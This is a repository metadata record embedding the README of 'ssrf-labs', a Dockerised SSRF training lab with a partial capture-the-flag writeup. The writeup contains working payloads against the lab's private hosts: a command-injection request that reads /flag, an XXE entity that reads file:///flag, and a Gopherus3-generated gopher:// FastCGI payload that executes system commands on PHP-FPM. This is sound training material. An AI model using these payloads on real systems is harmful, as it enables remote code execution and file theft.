{"id":26253055,"url":"https://github.com/probiusofficial/ssrf-labs","last_synced_at":"2025-04-24T06:07:04.267Z","repository":{"id":278048896,"uuid":"934322139","full_name":"ProbiusOfficial/ssrf-labs","owner":"ProbiusOfficial","description":"A comprehensive SSRF lab covering RCE, SQL injection, Tomcat, Redis, MySQL privilege escalation and other SSRF attack scenarios","archived":false,"fork":false,"pushed_at":"2025-03-18T03:25:29.000Z","size":35254,"stargazers_count":54,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-24T06:06:52.768Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ProbiusOfficial.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-17T16:28:50.000Z","updated_at":"2025-04-16T01:02:36.000Z","dependencies_parsed_at":null,"dependency_job_id":"d5003c88-f350-42bd-8a48-5a7c3a5f229e","html_url":"https://github.com/ProbiusOfficial/ssrf-labs","commit_stats":null,"previous_names":["probiusofficial/ssrf-labs"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProbiusOfficial%2Fssrf-labs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProbiusOfficial%2Fssrf-labs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProbiusOfficial%2Fssrf-labs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProbiusOfficial%2Fssrf-labs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH
ub/owners/ProbiusOfficial","download_url":"https://codeload.github.com/ProbiusOfficial/ssrf-labs/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250573351,"owners_count":21452352,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-03-13T17:29:45.336Z","updated_at":"2025-04-24T06:07:04.261Z","avatar_url":"https://github.com/ProbiusOfficial.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ssrf-labs\nA comprehensive SSRF lab based on Guoguang's sqlsec/ssrf-vuls, with some levels rebuilt and a complete Dockerfile and docker-compose added.\n\nTopology diagram of the lab design:\n\n![QQ_1742260818430](./assets/QQ_1742260818430.png)\n\n \n\n| Service name | Attack technique tested | IP address |\n| :--- | :--- | :--- |\n| CodeExec - code execution | Gopher-HTTP | 172.72.23.22 |\n| SQLInject - SQL injection | Gopher-HTTP | 172.72.23.23 |\n| XXE - external entity injection | Gopher-HTTP | 172.72.23.24 |\n| Tomcat - arbitrary file write via PUT method (CVE-2017-12615) | Gopher-HTTP | 172.72.23.25 |\n| CommandExec - command execution | Gopher-HTTP | 172.72.23.26 |\n| RedisUnauth - unauthenticated Redis | Dict | 172.72.23.27 |\n| RedisAuth - combined exploitation of Redis with authentication | Dict | 172.72.23.28 |\n| MySQLUnauth - unauthenticated MySQL | Gopher-TCP | 172.72.23.29 |\n| FpmUnauth - unauthenticated FPM (FastCGI protocol) | Gopher-TCP | 172.72.23.30 |\n\n\n## Usage\nClone this project, then run `docker-compose up -d`.\n```\ngit clone https://github.com/ProbiusOfficial/ssrf-labs.git\ncd ssrf-labs\ndocker-compose up -d\n```\nVisit port 8080 to see the lab page.\n\n## Writeup\nThis lab aligns with Guoguang's lab - [A hands-on guide to breaking through an internal network with SSRF](https://www.sqlsec.com/2021/05/ssrf.html).\n\nA writeup is also provided here, with a few additions.\n\n### 172.72.23.21-Entry\n\n\n\n### 172.72.23.22-CodeExec\n\n\n\n### 172.72.23.23-SQLI\n\n\n\n### 172.72.23.24-CommandExec\n\n\n\n```\nPOST /ping.php HTTP/1.1\nHost: 172.72.23.24\nContent-Length: 28\nCache-Control: max-age=0\nContent-Type: application/x-www-form-urlencoded\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://core.hello-ctf.com:8011/\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\nConnection: close\n\ntarget=1.1.1.1%3Bcat+%2Fflag\n```\n\n![image-20250220221045642](./assets/image-20250220221045642.png)\n\n### 172.72.23.25-XXE\n\nAfter retrieving the source code over HTTP, work out the request format from it (or start a separate container locally and capture traffic to build the request):\n\nFor example, modify\n\n![image-20250227162255156](./assets/image-20250227162255156.png)\n\n```\nPOST / HTTP/1.1\nHost: 172.72.23.25\nContent-Length: 168\nCache-Control: max-age=0\nOrigin: http://localhost\nContent-Type: application/x-www-form-urlencoded\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://localhost/\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\nsec-ch-ua: \"Not(A:Brand\";v=\"99\", \"Microsoft Edge\";v=\"133\", \"Chromium\";v=\"133\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Windows\"\nsec-fetch-site: none\nsec-fetch-mode: navigate\nsec-fetch-user: ?1\nsec-fetch-dest: document\nConnection: close\n\n\u003c?xml version=\"1.0\" encoding= \"UTF-8\"?\u003e\u003c!DOCTYPE user [\u003c!ENTITY xxe SYSTEM \"file:///flag\" \u003e]\u003e\u003cuser\u003e\t\u003cusername\u003e\u0026xxe;\u003c/username\u003e\t\u003cpassword\u003eadmin\u003c/password\u003e\u003c/user\u003e\n\n```\n\n\n\n\n\n### 172.72.23.26-Tomcat\n\n\n\n### 172.72.23.27-Redisunauth\n\n\n\n### 172.72.23.28-Redisauth\n\n\n\n### 172.72.23.29-MySQL\n\n\n\n### 172.72.23.30-fpm (FastCGI protocol)\n\n\u003e  tip: I was lazy and did not inject a flag; running the ls command and getting output back counts as success, okay -v-\n\n[Fastcgi protocol analysis \u0026\u0026 PHP-FPM unauthorized access vulnerability \u0026\u0026 writing the exp](https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html)\n\ntip: In the stock environment (here meaning the php:fpm image used), the PHP files available on the target machine are as follows:\n\n```\nroot@hello-ctf:/# find / -name \"*.php\"\n/usr/local/lib/php/pearcmd.php\n/usr/local/lib/php/peclcmd.php\n/usr/local/lib/php/doc/XML_Util/examples/example.php\n/usr/local/lib/php/doc/XML_Util/examples/example2.php\n/usr/local/lib/php/test/XML_Util/tests/Bug5392Tests.php\n/usr/local/lib/php/test/XML_Util/tests/AttributesToStringTests.php\n/usr/local/lib/php/test/XML_Util/tests/SplitQualifiedNameTests.php\n/usr/local/lib/php/test/XML_Util/tests/RaiseErrorTests.php\n/usr/local/lib/php/test/XML_Util/tests/Bug21184Tests.php\n/usr/local/lib/php/test/XML_Util/tests/CollapseEmptyTagsTests.php\n/usr/local/lib/php/test/XML_Util/tests/GetDocTypeDeclarationTests.php\n/usr/local/lib/php/test/XML_Util/tests/IsValidNameTests.php\n/usr/local/lib/php/test/XML_Util/tests/CreateTagFromArrayTests.php\n/usr/local/lib/php/test/XML_Util/tests/Bug4950Tests.php\n/usr/local/lib/php/test/XML_Util/tests/Bug21177Tests.php\n/usr/local/lib/php/test/XML_Util/tests/Bug18343Tests.php\n/usr/local/lib/php/test/XML_Util/tests/CreateEndElementTests.php\n/usr/local/lib/php/test/XML_Util/tests/GetXmlDeclarationTests.php\n/usr/local/lib/php/test/XML_Util/tests/CreateTagTests.php\n/usr/local/lib/php/test/XML_Util/tests/CreateStartElementTests.php\n/usr/local/lib/php/test/XML_Util/tests/ReverseEntitiesTests.php\n/
usr/local/lib/php/test/XML_Util/tests/CreateCDataSectionTests.php\n/usr/local/lib/php/test/XML_Util/tests/ReplaceEntitiesTests.php\n/usr/local/lib/php/test/XML_Util/tests/AbstractUnitTests.php\n/usr/local/lib/php/test/XML_Util/tests/ApiVersionTests.php\n/usr/local/lib/php/test/XML_Util/tests/CreateCommentTests.php\n/usr/local/lib/php/test/Structures_Graph/tests/BasicGraphTest.php\n/usr/local/lib/php/test/Structures_Graph/tests/TopologicalSorterTest.php\n/usr/local/lib/php/test/Structures_Graph/tests/AcyclicTestTest.php\n/usr/local/lib/php/Structures/Graph.php\n/usr/local/lib/php/Structures/Graph/Manipulator/AcyclicTest.php\n/usr/local/lib/php/Structures/Graph/Manipulator/TopologicalSorter.php\n/usr/local/lib/php/Structures/Graph/Node.php\n/usr/local/lib/php/System.php\n/usr/local/lib/php/OS/Guess.php\n/usr/local/lib/php/PEAR/Task/Windowseol/rw.php\n/usr/local/lib/php/PEAR/Task/Postinstallscript/rw.php\n/usr/local/lib/php/PEAR/Task/Common.php\n/usr/local/lib/php/PEAR/Task/Replace.php\n/usr/local/lib/php/PEAR/Task/Unixeol.php\n/usr/local/lib/php/PEAR/Task/Unixeol/rw.php\n/usr/local/lib/php/PEAR/Task/Replace/rw.php\n/usr/local/lib/php/PEAR/Task/Postinstallscript.php\n/usr/local/lib/php/PEAR/Task/Windowseol.php\n/usr/local/lib/php/PEAR/Config.php\n/usr/local/lib/php/PEAR/ChannelFile.php\n/usr/local/lib/php/PEAR/Exception.php\n/usr/local/lib/php/PEAR/Common.php\n/usr/local/lib/php/PEAR/REST/10.php\n/usr/local/lib/php/PEAR/REST/11.php\n/usr/local/lib/php/PEAR/REST/13.php\n/usr/local/lib/php/PEAR/Installer.php\n/usr/local/lib/php/PEAR/Command/Config.php\n/usr/local/lib/php/PEAR/Command/Common.php\n/usr/local/lib/php/PEAR/Command/Pickle.php\n/usr/local/lib/php/PEAR/Command/Build.php\n/usr/local/lib/php/PEAR/Command/Package.php\n/usr/local/lib/php/PEAR/Command/Mirror.php\n/usr/local/lib/php/PEAR/Command/Install.php\n/usr/local/lib/php/PEAR/Command/Auth.php\n/usr/local/lib/php/PEAR/Command/Remote.php\n/usr/local/lib/php/PEAR/Command/Channels.php\n/usr/local/lib/php/PEAR/Comma
nd/Registry.php\n/usr/local/lib/php/PEAR/Command/Test.php\n/usr/local/lib/php/PEAR/ErrorStack.php\n/usr/local/lib/php/PEAR/Proxy.php\n/usr/local/lib/php/PEAR/Frontend.php\n/usr/local/lib/php/PEAR/PackageFile/v2/rw.php\n/usr/local/lib/php/PEAR/PackageFile/v2/Validator.php\n/usr/local/lib/php/PEAR/PackageFile/v2.php\n/usr/local/lib/php/PEAR/PackageFile/Parser/v2.php\n/usr/local/lib/php/PEAR/PackageFile/Parser/v1.php\n/usr/local/lib/php/PEAR/PackageFile/v1.php\n/usr/local/lib/php/PEAR/PackageFile/Generator/v2.php\n/usr/local/lib/php/PEAR/PackageFile/Generator/v1.php\n/usr/local/lib/php/PEAR/Command.php\n/usr/local/lib/php/PEAR/Frontend/CLI.php\n/usr/local/lib/php/PEAR/Downloader.php\n/usr/local/lib/php/PEAR/RunTest.php\n/usr/local/lib/php/PEAR/Downloader/Package.php\n/usr/local/lib/php/PEAR/ChannelFile/Parser.php\n/usr/local/lib/php/PEAR/REST.php\n/usr/local/lib/php/PEAR/PackageFile.php\n/usr/local/lib/php/PEAR/Packager.php\n/usr/local/lib/php/PEAR/Builder.php\n/usr/local/lib/php/PEAR/Validator/PECL.php\n/usr/local/lib/php/PEAR/DependencyDB.php\n/usr/local/lib/php/PEAR/Validate.php\n/usr/local/lib/php/PEAR/Dependency2.php\n/usr/local/lib/php/PEAR/Installer/Role.php\n/usr/local/lib/php/PEAR/Installer/Role/Www.php\n/usr/local/lib/php/PEAR/Installer/Role/Cfg.php\n/usr/local/lib/php/PEAR/Installer/Role/Doc.php\n/usr/local/lib/php/PEAR/Installer/Role/Common.php\n/usr/local/lib/php/PEAR/Installer/Role/Data.php\n/usr/local/lib/php/PEAR/Installer/Role/Ext.php\n/usr/local/lib/php/PEAR/Installer/Role/Php.php\n/usr/local/lib/php/PEAR/Installer/Role/Src.php\n/usr/local/lib/php/PEAR/Installer/Role/Test.php\n/usr/local/lib/php/PEAR/Installer/Role/Man.php\n/usr/local/lib/php/PEAR/Installer/Role/Script.php\n/usr/local/lib/php/PEAR/XMLParser.php\n/usr/local/lib/php/PEAR/Registry.php\n/usr/local/lib/php/build/run-tests.php\n/usr/local/lib/php/build/gen_stub.php\n/usr/local/lib/php/Console/Getopt.php\n/usr/local/lib/php/XML/Util.php\n/usr/local/lib/php/Archive/Tar.php\n/usr/local/lib/php
/PEAR.php\n```\n\nThis challenge can be solved with the tool [Esonhugh-Gopherus3](https://github.com/Esonhugh/Gopherus3):\n\n```\nPS C:\\Users\\admin\u003e gopherus3 --exploit fastcgi --host 172.72.23.30\n       ________              .__                                ________\n     /  _____/  ____ ______ |  |__   ___________ __ __  ______ \\_____  \\\n    /   \\  ___ /  _ \\\\____ \\|  |  \\_/ __ \\_  __ \\  |  \\/  ___/   _(__  \u003c\n    \\    \\_\\  (  \u003c_\u003e )  |_\u003e \u003e   Y  \\  ___/|  | \\/  |  /\\___ \\   /       \\\n     \\______  /\\____/|   __/|___|  /\\___  \u003e__|  |____//____  \u003e /______  /\n            \\/       |__|        \\/     \\/                 \\/         \\/\n\n\nGive one file name which should be surely present in the server (prefer .php file)\nif you don't know press ENTER we have default one:  /usr/local/lib/php/pearcmd.php\nTerminal command to run:  ls /\n\nYour gopher link is ready to do SSRF:\n\ngopher://172.72.23.30:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0B%03%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH56%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%1ESCRIPT_FILENAME/usr/local/lib/php/pearcmd.php%0D%01DOCUMENT_ROOT/%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%008%04%00%3C%3Fphp%20system%28%27ls%20/%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00\n```\n\n\n\n## Acknowledgements\n\n- [Guoguang: A hands-on guide to breaking through an internal network with SSRF](https://www.sqlsec.com/2021/05/ssrf.html)\n- [GitHub: sqlsec/ssrf-vuls](https://github.com/sqlsec/ssrf-vuls)\n- [GitHub: tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)\n- [GitHub: LS95/gopher-redis-auth](https://github.com/LS95/gopher-redis-auth)\n\n## Open-source license\n\n- This project is based on an original repository that has no license: https://github.com/sqlsec/ssrf-vuls\n- All added/modified code is released under the MIT license (see the LICENSE file)\n- Users bear the risk of using the unlicensed code themselves\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprobiusofficial%2Fssrf-labs","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fprobiusofficial%2Fssrf-labs","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprobiusofficial%2Fssrf-labs/lists"}